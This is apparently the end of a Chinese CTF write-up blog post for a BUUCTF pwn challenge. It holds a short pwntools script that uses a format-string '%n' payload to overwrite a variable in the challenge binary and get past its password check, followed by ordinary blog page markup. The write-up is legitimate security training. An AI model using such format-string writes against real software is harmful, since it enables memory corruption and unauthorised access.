<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">26163</span>)<br>dword_addr = <span class="hljs-number">0x804c044</span><br>payload = p32(dword_addr) + <span class="hljs-string">b&#x27;%10$n&#x27;</span> <span class="hljs-comment">#已经输出的dword变量的地址，因为是32位程序，所以占4字节，那么密码就是4</span><br>p.sendline(payload)<br>p.sendlineafter(<span class="hljs-string">b&#x27;:&#x27;</span>,<span class="hljs-built_in">str</span>(<span class="hljs-number">4</span>))<br>p.interactive()<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%88%B7%E9%A2%98%E9%A2%98%E8%A7%A3/" class="category-chain-item">刷题题解</a>
  
  
    <span>></span>
    
  <a href="/categories/%E5%88%B7%E9%A2%98%E9%A2%98%E8%A7%A3/BUUCTF/" class="category-chain-item">BUUCTF</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pwn-%E9%A2%98%E8%A7%A3-write-ups/" class="print-no-link">#pwn 题解 write-ups</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>BUUCTF题解</div>
      <div>https://www.ghostfoxy.cn/2025/11/14/buuwp1/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Gh0stF0xy</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年11月14日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2025年11月17日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/11/16/SWPU/" title="NSSCTF中的SWPU刷题记录">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">NSSCTF中的SWPU刷题记录</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/11/08/FTN001/" title="如何优雅地配置pwn环境(Win|Mac)">
                        <span class="hidden-mobile">如何优雅地配置pwn环境(Win|Mac)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"VhTlgfxKd3QHFcy8hxOOeYZL-gzGzoHsz","appKey":"sbmhiCHu7NJ5FlmW7gsyreKf","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      Copyright © 2025-2026 GhostFoxy
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  var relativeDate = function() {
    var updatedTime = document.getElementById('updated-time');
    if (updatedTime) {
      var text = updatedTime.textContent;
      var reg = /\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:Z|[+-]\d{2}:\d{2})/;
      var matchs = text.match(reg);
      if (matchs) {
        var relativeTime = moment(matchs[0]).fromNow();
        updatedTime.textContent = text.replace(reg, relativeTime);
      }
      updatedTime.style.display = '';
    }
  };
  Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/moment.min.js', function() {
    if (!'zh-cn'.startsWith('en')) {
      Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/locale/zh-cn.min.js', function() {
        relativeDate();
      });
    } else {
      relativeDate();
    }
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="/js/leancloud.js" ></script>




  
<script src="/js/backgroundize.js"></script>
<script src="/js/snow.js"></script>
<script src="/js/scrollAnimation.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
